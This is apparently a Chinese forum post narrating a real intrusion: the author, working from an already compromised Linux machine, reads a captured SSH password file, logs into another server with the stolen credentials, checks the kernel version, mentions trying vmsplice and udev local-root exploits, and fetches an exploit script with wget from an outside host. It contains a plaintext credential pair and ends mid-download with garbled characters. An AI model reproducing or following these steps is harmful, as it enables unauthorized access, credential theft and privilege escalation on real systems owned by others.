一台linux肉鸡的简单手工入侵检测过程
一台linux肉鸡的简单手工入侵检测过程by:vitter
blog:blog.securitycn.net
今天发现一台肉鸡上某人的ssh连到另外一台服务器上,记录下了密码。
# cat /tmp/sshpswd
ldc:sle823jfsGs@222.222.66.11
直接ssh上去。
# ssh ldc@222.222.66.11
ldc@222.222.66.11's password:
Last login: Fri Jul 17 13:11:38 2009 from 221.140.140.200
$ cat /etc/issue
Red Hat Enterprise Linux Server release 5 (Tikanga)
Kernel \r on an \m
$ uname -a
Linux localhost.localdomain 2.6.18-8.el5 #1 SMP Fri Jan 26 14:15:21 EST 2007 i686 i686 i386 GNU/Linux
是rhel5.0没升级过内核,vmsplice的local root应该可以的,不过测试了下,机器挂了,换udev的好了。
$ mkdir .v
$ cd .v
$ wget http://211.100.50.70/u.sh
--13:21:09--http://211.100.50.70/u.sh
Connecting to 211.100.50.70:80... 宸茶繛鎺ャ
页:
[1]